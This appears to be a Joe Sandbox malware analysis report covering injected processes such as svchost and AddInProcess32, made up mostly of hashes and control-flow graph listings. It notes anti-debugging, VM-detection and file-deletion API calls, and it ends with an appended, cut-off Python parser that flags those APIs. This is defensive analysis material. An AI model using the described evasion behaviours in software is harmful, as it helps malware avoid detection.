                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dab8a57280ce247df75c4dfcfa0bc9649dd90a3e6d31421431c3a212a5450ee7
                                                                                                                                                                                                                                                    • Instruction ID: 72501760d34eabf0664d7b56fac40c21212e4a5d87704841395777818aa37ec5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab8a57280ce247df75c4dfcfa0bc9649dd90a3e6d31421431c3a212a5450ee7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6017175B212154FDB60A62CD8557AE77D6EB8A750F148429E90AC7380DE15EC02C784
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
Execution Graph

Execution Coverage: 13.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 24
Total number of Limit Nodes: 1
execution_graph: [rendered graph omitted; its nodes are function addresses in the 7ff7c19a0000 range, with call edges to LoadLibraryA, VirtualProtect and FreeConsole]

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1412 7ff7c1a80d71-7ff7c1a80e13 1417 7ff7c1a80e56-7ff7c1a80ecf 1412->1417 1418 7ff7c1a80e15-7ff7c1a80e26 1412->1418 1423 7ff7c1a81027-7ff7c1a81036 1417->1423 1424 7ff7c1a80ed5-7ff7c1a80ee8 1417->1424 1428 7ff7c1a81038-7ff7c1a81039 1423->1428 1424->1423 1425 7ff7c1a80eee-7ff7c1a80f1a 1424->1425 1425->1423 1427 7ff7c1a80f20-7ff7c1a80f33 1425->1427 1432 7ff7c1a80f35-7ff7c1a80f36 1427->1432 1433 7ff7c1a80fa4-7ff7c1a80fb6 1427->1433 1429 7ff7c1a8103c-7ff7c1a81058 1428->1429 1430 7ff7c1a8103b 1428->1430 1434 7ff7c1a8105b-7ff7c1a81069 1429->1434 1430->1429 1435 7ff7c1a80efc-7ff7c1a80f00 1432->1435 1436 7ff7c1a80f38-7ff7c1a80f3a 1432->1436 1433->1423 1438 7ff7c1a80fb8-7ff7c1a80fea 1433->1438 1437 7ff7c1a8106b-7ff7c1a81071 1434->1437 1442 7ff7c1a80f03-7ff7c1a80f1a 1435->1442 1443 7ff7c1a80f02 1435->1443 1444 7ff7c1a80f3c-7ff7c1a80f45 1436->1444 1445 7ff7c1a80f81 1436->1445 1440 7ff7c1a8107e-7ff7c1a81080 1437->1440 1441 7ff7c1a81073-7ff7c1a8107d 1437->1441 1438->1434 1456 7ff7c1a80fec-7ff7c1a80fef 1438->1456 1446 7ff7c1a81092-7ff7c1a81097 1440->1446 1447 7ff7c1a81082-7ff7c1a8108f 1440->1447 1441->1440 1442->1423 1442->1427 1443->1442 1450 7ff7c1a80f47-7ff7c1a80f65 1444->1450 1451 7ff7c1a80f66-7ff7c1a80f7e 1444->1451 1445->1423 1455 7ff7c1a80f87-7ff7c1a80fa2 1445->1455 1452 7ff7c1a810cc-7ff7c1a810e4 1446->1452 1453 7ff7c1a81099-7ff7c1a810b0 1446->1453 1447->1446 1450->1423 1463 7ff7c1a80f6b-7ff7c1a80f7e 1450->1463 1451->1445 1458 7ff7c1a810b2-7ff7c1a810ca 1453->1458 1459 7ff7c1a81121-7ff7c1a81157 1453->1459 1455->1433 1456->1437 1462 7ff7c1a80ff1 1456->1462 1458->1452 1468 7ff7c1a8118c-7ff7c1a811a4 1459->1468 1469 7ff7c1a81159-7ff7c1a81170 1459->1469 1462->1428 1466 7ff7c1a80ff3-7ff7c1a81026 1462->1466 1463->1445 1471 
7ff7c1a81172-7ff7c1a8118a 1469->1471 1472 7ff7c1a811e1-7ff7c1a81230 1469->1472 1471->1468 1480 7ff7c1a81232-7ff7c1a81264 1472->1480 1481 7ff7c1a812a1-7ff7c1a812e9 1472->1481 1487 7ff7c1a812fd-7ff7c1a812fe 1481->1487 1488 7ff7c1a812eb-7ff7c1a812fb 1481->1488 1489 7ff7c1a81301-7ff7c1a81318 1487->1489 1488->1489 1493 7ff7c1a8134b-7ff7c1a813c9 1489->1493 1494 7ff7c1a8131a-7ff7c1a8131c 1489->1494 1500 7ff7c1a813cb-7ff7c1a813f9 1493->1500 1501 7ff7c1a81413-7ff7c1a81444 1493->1501 1494->1493 1495 7ff7c1a8131e-7ff7c1a81344 1494->1495 1495->1493 1503 7ff7c1a814a5-7ff7c1a814b5 1500->1503 1504 7ff7c1a813ff-7ff7c1a81412 1500->1504 1501->1503 1505 7ff7c1a81446-7ff7c1a81462 1501->1505 1509 7ff7c1a814b8-7ff7c1a81508 1503->1509 1510 7ff7c1a814b7 1503->1510 1504->1503 1506 7ff7c1a81418-7ff7c1a81444 1504->1506 1505->1503 1506->1503 1506->1505 1513 7ff7c1a8150a-7ff7c1a81517 1509->1513 1514 7ff7c1a8151f-7ff7c1a81530 1509->1514 1510->1509 1516 7ff7c1a8154c-7ff7c1a81564 1513->1516 1517 7ff7c1a81519-7ff7c1a8151d 1513->1517 1518 7ff7c1a81532-7ff7c1a8154a 1514->1518 1519 7ff7c1a815a1-7ff7c1a815ea 1514->1519 1517->1514 1518->1516 1526 7ff7c1a815ec-7ff7c1a815ee 1519->1526 1527 7ff7c1a8165b-7ff7c1a81668 1519->1527 1528 7ff7c1a8166a-7ff7c1a816f6 1526->1528 1529 7ff7c1a815f0-7ff7c1a81618 1526->1529 1527->1528 1542 7ff7c1a816f8-7ff7c1a81713 1528->1542 1543 7ff7c1a81766-7ff7c1a81790 1528->1543 1536 7ff7c1a8162c-7ff7c1a81639 1529->1536 1537 7ff7c1a8161a-7ff7c1a8162b 1529->1537 1537->1536 1555 7ff7c1a81727-7ff7c1a81731 1542->1555 1556 7ff7c1a81715-7ff7c1a81726 1542->1556 1546 7ff7c1a817a9 1543->1546 1547 7ff7c1a81792-7ff7c1a817a7 1543->1547 1549 7ff7c1a817ab-7ff7c1a817d9 1546->1549 1550 7ff7c1a817f3-7ff7c1a81824 1546->1550 1547->1546 1552 7ff7c1a81893-7ff7c1a818a5 1549->1552 1553 7ff7c1a817df-7ff7c1a817f2 1549->1553 1550->1552 1554 7ff7c1a81826-7ff7c1a81840 1550->1554 1562 7ff7c1a818a8-7ff7c1a818f0 1552->1562 1563 7ff7c1a818a7 1552->1563 1553->1550 1553->1552 1554->1552 1556->1555 1566 
7ff7c1a8190a-7ff7c1a81920 1562->1566 1567 7ff7c1a818f2-7ff7c1a81907 1562->1567 1563->1562 1568 7ff7c1a81934-7ff7c1a8194f 1566->1568 1569 7ff7c1a81922-7ff7c1a81926 1566->1569 1567->1566 1570 7ff7c1a8192b-7ff7c1a81930 1569->1570 1570->1570 1571 7ff7c1a81932-7ff7c1a81933 1570->1571 1571->1568
Memory Dump Source
• Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cd0bd326f624f03dfdf1a776c1fdaaa56920b98d704525b4544f96c72ff8e72
• Instruction ID: 472cce6c23017d950e1f323858c94c26c18974f1e82081a2556908293efb47e0
• Opcode Fuzzy Hash: 3cd0bd326f624f03dfdf1a776c1fdaaa56920b98d704525b4544f96c72ff8e72
• Instruction Fuzzy Hash: FB82267190DBC58FE756EF2888556A8BFE0FF56314B4901FFC489CB493DA68A806C391
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID: $
• API String ID: 1029625771-3993045852
• Opcode ID: 65a754a99105a1bd678e00567eccaf26018f439ddbe1bff99e68736da1e235f5
• Instruction ID: 3e2954f15fd35c9453cfef9530c3a4b33d54ba1d941e3700120946447dc72b9b
• Opcode Fuzzy Hash: 65a754a99105a1bd678e00567eccaf26018f439ddbe1bff99e68736da1e235f5
• Instruction Fuzzy Hash: 7481D630508A8D8FEB58EF28D8457F57BD1FF59324F10417EE84DC7292DA74A8458B92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: 198fd46360dd4673e13dca9be8104204ef3640ec805e10a2ee29f0189aa05fe8
• Instruction ID: 809826535ac4be12e326f981bd4ab1e042a6b8843051da4b4699bb3b64d63275
• Opcode Fuzzy Hash: 198fd46360dd4673e13dca9be8104204ef3640ec805e10a2ee29f0189aa05fe8
• Instruction Fuzzy Hash: 66626C7180DB858FE756EF288855AA8FFE0FF56310F5405FBC089CB593DA64A806C7A1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 059aa15f8562d2a419072f7308eea90f897467239296b2c71ef3632d6420ea55
• Instruction ID: 49fd32fb50de9a8121bf60990effe51e6d0eacbf00afa8af091bfcbd75b1a63c
• Opcode Fuzzy Hash: 059aa15f8562d2a419072f7308eea90f897467239296b2c71ef3632d6420ea55
• Instruction Fuzzy Hash: 4A31C53090CA488FDB18EFA898466F9BBE1FB56321F14426FD049C3292DF646856CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
Similarity
• API ID: ConsoleFree
• String ID:
• API String ID: 771614528-0
• Opcode ID: 86525104b4e44cf35dc287c44005da11f9017dc464887b92e6acab49b39fba75
• Instruction ID: 35a56f22a3d13e6cbd7826cf2ce05a34b2e35d07cc212588d13aa30dc5954f40
• Opcode Fuzzy Hash: 86525104b4e44cf35dc287c44005da11f9017dc464887b92e6acab49b39fba75
• Instruction Fuzzy Hash: E031A57090CB488FDB19DFA8D8497EABBF0EF56321F04426FD089C3192DA74A459CB51
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 33e48d55f88e567b6898672d290c01df4343d325f0da49b6025b397cae56173d
                                                                                                                                                                                                                                                    • Instruction ID: 84e17a053b65fd18cd311d86a7df5a807462158f291b60d9048192cdb30712ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e48d55f88e567b6898672d290c01df4343d325f0da49b6025b397cae56173d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5661267090CA894FDB46EF2888659A5BBF0FF56314B4501FBC44ACB593DE28B846C351
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:23
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-3993045852
• Opcode ID: 4edf0b2d7b70c93d830d535313e487f253c36e67dce5186b6c46195efa9c5465
• Instruction ID: 29cd69b85cce2dca9dddd8eb33c74ba085c570328593988e6eb95f7235f808a5
• Opcode Fuzzy Hash: 4edf0b2d7b70c93d830d535313e487f253c36e67dce5186b6c46195efa9c5465
• Instruction Fuzzy Hash: 90221735E002189FDF65DB65C5906AEBBB6FF84320F248469D816EB394DB31EC41CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e19d5880bd454b03519c1bdc426eae234ec7a9814597ecd8b692d33283fe66bb
• Instruction ID: 468c085a37d7964fca073933f4fb2f7e31910c3fb9c9337432562f8bbe243b9e
• Opcode Fuzzy Hash: e19d5880bd454b03519c1bdc426eae234ec7a9814597ecd8b692d33283fe66bb
• Instruction Fuzzy Hash: EB926634E102089FDB64DB68C594A5DBBFAFB49310F54C4A9D809AB351DB35ED82CFA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bec4789bd25091f80c0e8621984a28e495d2cf097c3d69fd1aa5556f74322ef6
• Instruction ID: ac824c3e0af09ad01184aa53b43aa2656ea5ff97d96100cf68513fd143e85a59
• Opcode Fuzzy Hash: bec4789bd25091f80c0e8621984a28e495d2cf097c3d69fd1aa5556f74322ef6
• Instruction Fuzzy Hash: E5629234A002099FEF54DB68D594BADB7B6FF84314F148469E806DB394DB35EC86CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e05ec1a949d03c1add1d42231451574e803d634fe9471dac6af63b7241a5b99a
• Instruction ID: 43f343181c7a4db6c458f21621dfb044085991c177c3ffd1b564d0fe233f7677
• Opcode Fuzzy Hash: e05ec1a949d03c1add1d42231451574e803d634fe9471dac6af63b7241a5b99a
• Instruction Fuzzy Hash: 9832A234B002089FDF64DB68D490BAEB7B6FB88310F508525E805EB355DB75EC92CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ac8494ba0e1460de69504adc6130f728fb7084b9eead0df634deb765bd333cb
• Instruction ID: 5532da4efcc7ea3ca84334891404ac12b653f232fe50ff0aaadd6079951bd76b
• Opcode Fuzzy Hash: 3ac8494ba0e1460de69504adc6130f728fb7084b9eead0df634deb765bd333cb
• Instruction Fuzzy Hash: 0C22A770E102099FEF64DB69E4907AFB7B6FB45310F64852AE845DB391CA34EC81CB61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 97f35e5047450b97188a8a8a76dcdc9dfdffbee2b2fa7b868907726594b8462d
• Instruction ID: 92a2b9a892efadcb3605651ae388306d916a8a93db155c47e755587767cb82b0
• Opcode Fuzzy Hash: 97f35e5047450b97188a8a8a76dcdc9dfdffbee2b2fa7b868907726594b8462d
• Instruction Fuzzy Hash: F1321D30E10619CFDB15EF65C8906ADB7B6FF99300F6086A9D409BB354EB70A985CF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ce9479225b7047c027bf67c9349dfcfc7efacb69d1871b9ef5b655751362608
• Instruction ID: 48a4333b07217a314fe3fba920b91e71ff6555bc929e77297f995c5a11e0ae5c
• Opcode Fuzzy Hash: 7ce9479225b7047c027bf67c9349dfcfc7efacb69d1871b9ef5b655751362608
• Instruction Fuzzy Hash: 12027F30B002098FDF54DB68D490BAEBBA6FF85310F548969D815DB395DB75EC82CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph: basic-block edge list for the function entered at 669a398 (blocks 669a310-669a63c; calls 6692068 and 6696598); graph layout data omitted.
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: X!@$x!@
• API String ID: 0-2527372166
• Opcode ID: 8b17353fb9e465e530c1b143862bb4871798a60f364eb17df4a8e235277d8f3e
• Instruction ID: 4dc2dac7040312a162177c2ca9b9d040ddfc7998da0b6995b03f7c2d2c72537e
• Opcode Fuzzy Hash: 8b17353fb9e465e530c1b143862bb4871798a60f364eb17df4a8e235277d8f3e
• Instruction Fuzzy Hash: 38818131F102089FDF54EBA9E4906ADB7F6EF88310F508969E816E7354DB319C86CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph: basic-block edge list for the function entered at 12bf38b (blocks 12bf38b-12bf515; calls 12bf38b and 12bf470; API GlobalMemoryStatusEx); graph layout data omitted.
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e780b4ba36493d52e601f4eb0b4471312b1d4863bdd6222572c7f27736d39ab5
• Instruction ID: 9515cf223da50afb341b802c8c39b54b00e8a79bfb02bb6ccba003a4929a589e
• Opcode Fuzzy Hash: e780b4ba36493d52e601f4eb0b4471312b1d4863bdd6222572c7f27736d39ab5
• Instruction Fuzzy Hash: 58412332D143998FCB14CFA9D8407EEBBF5EF89210F14856AD504A7242DB789885CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph: basic-block edge list for the function entered at 12b70c1 (blocks 12b70c1-12b7190; API CheckRemoteDebuggerPresent); graph layout data omitted.
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 012B713F
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 028b408d41c7da7ecc1e967df513b2e56c8181295cd509aa81dc2f91560e78c3
• Instruction ID: 710a1fd3a37a42921d10dad69b13e109988643cbf3d109218a54f724c1e2bf98
• Opcode Fuzzy Hash: 028b408d41c7da7ecc1e967df513b2e56c8181295cd509aa81dc2f91560e78c3
• Instruction Fuzzy Hash: B32166B2C002598FDB14CFAAD484BEEBBF5EF48320F14846AE855A7251D7789945CF60
Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 951 12b70c8-12b714c CheckRemoteDebuggerPresent 953 12b714e-12b7154 951->953 954 12b7155-12b7190 951->954 953->954
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 012B713F
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: a0c4e576d38b069957184addd190c02bc669fafc3390bdf2183de74c21bbce96
• Instruction ID: 2fdf27cf0c22cf1119b53e3e2fac38f35592b6ae121968eeaa9e63ad530de769
• Opcode Fuzzy Hash: a0c4e576d38b069957184addd190c02bc669fafc3390bdf2183de74c21bbce96
• Instruction Fuzzy Hash: A72145B28002598FDB14CF9AD884BEEBBF5EF48310F14842AE858A3250D778A944CF60
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 957 12b8841-12b8892 960 12b889a-12b88c5 DeleteFileW 957->960 961 12b8894-12b8897 957->961 962 12b88ce-12b88f6 960->962 963 12b88c7-12b88cd 960->963 961->960 963->962
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 012B88B8
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 1991edda93741659a4017d4d3b5cfa474aab64e658e55dfc0daea2b960e73787
• Instruction ID: 742f644944cc910d95e9cd39541b5876a9820108e7ade597a5c8fdc9bb0118df
• Opcode Fuzzy Hash: 1991edda93741659a4017d4d3b5cfa474aab64e658e55dfc0daea2b960e73787
• Instruction Fuzzy Hash: C82147B2C0061A9FDB14CF9AD5847EEFBF4FB48310F14812AD918A7240D378A945CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 966 12b8848-12b8892 968 12b889a-12b88c5 DeleteFileW 966->968 969 12b8894-12b8897 966->969 970 12b88ce-12b88f6 968->970 971 12b88c7-12b88cd 968->971 969->968 971->970
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 012B88B8
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 1e117b5061fe1395e1ef3d70d4e3802ed0904fd66dfb81a268da779823e5728b
• Instruction ID: f2c1eed8b254b45a298a5eac015192e24c55a0b625814bd295cdd601607c5383
• Opcode Fuzzy Hash: 1e117b5061fe1395e1ef3d70d4e3802ed0904fd66dfb81a268da779823e5728b
• Instruction Fuzzy Hash: D01136B2C0061A9BDB14CF9AD5447DEFBB4FF48320F14812AD918A7240D378A944CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 974 12bf470-12bf4e4 GlobalMemoryStatusEx 977 12bf4ed-12bf515 974->977 978 12bf4e6-12bf4ec 974->978 978->977
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 012BF4D7
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: db8a6768022b5df6eaf12730be239d9e5f097c77de41956c9e2e0223bf296fb9
• Instruction ID: 950229abae18809e70847d6264e0e7070378bc05c28a0ecf8041338a45b3fa1c
• Opcode Fuzzy Hash: db8a6768022b5df6eaf12730be239d9e5f097c77de41956c9e2e0223bf296fb9
• Instruction Fuzzy Hash: 0F11E2B2C0065A9BDB24DF9AD544BDEFBF4FF48320F14816AD918A7240D378A944CFA5
Uniqueness
Uniqueness Score: -1.00%
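The function records above give, per recovered function, the Windows API the sandbox resolved at each call site (CheckRemoteDebuggerPresent, DeleteFileW, GlobalMemoryStatusEx) together with the memory dump and snapshot the function came from. As an added example that is not part of the Joe Sandbox report, the Python below parses records in exactly this layout, extracts the API call sites and their reference addresses, and flags the APIs that are commonly used for anti-analysis. The embedded record text is constructed from the layout on this page, and the API-to-technique map is the example's own heuristic, not a Joe Sandbox classification.

```python
"""Parse Joe Sandbox function records and flag anti-analysis API calls.

Added example, not Joe Sandbox code. SAMPLE is constructed to mirror the
record layout on this page; ANTI_ANALYSIS is a heuristic map of our own.
"""
import re

# Every function record in the report starts with this header line.
RECORD_HEADER = "Control-flow Graph"

# "• Api.MODULE(args), ref: 0123ABCD"  or  "• Api.MODULE ref: 0123ABCD"
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "• Key Name: value" metadata bullets (Source File, Snapshot File, Opcode ID, ...)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Heuristic: APIs that malware routinely uses to detect debuggers or VMs.
# This is the example's own assumption, not a taxonomy from the report.
ANTI_ANALYSIS = {
    "CheckRemoteDebuggerPresent": "anti-debugging",
    "IsDebuggerPresent": "anti-debugging",
    "GlobalMemoryStatusEx": "VM detection (physical memory size check)",
    "GetSystemFirmwareTable": "VM detection (SMBIOS/ACPI firmware tables)",
}

# Constructed sample: three records in the report's layout.
SAMPLE = """\
Control-flow Graph
control_flow_graph 951 12b70c8-12b714c CheckRemoteDebuggerPresent 953 12b714e-12b7154 951->953
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 012B713F
Memory Dump Source
• Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 957 12b8841-12b8892 960 12b889a-12b88c5 DeleteFileW 957->960
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 012B88B8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: DeleteFile

Control-flow Graph
control_flow_graph 974 12bf470-12bf4e4 GlobalMemoryStatusEx 977 12bf4ed-12bf515 974->977
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 012BF4D7
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
Similarity
• API ID: GlobalMemoryStatus
"""


def parse_records(text):
    """Split report text into records; each holds its API calls and metadata."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()  # the extracted report carries heavy leading whitespace
        if line == RECORD_HEADER:
            current = {"apis": [], "fields": {}}
            records.append(current)
            continue
        if current is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            current["apis"].append((m["api"], m["module"], m["ref"].upper()))
            continue
        m = FIELD_RE.match(line)
        if m:
            current["fields"][m["key"]] = m["val"]
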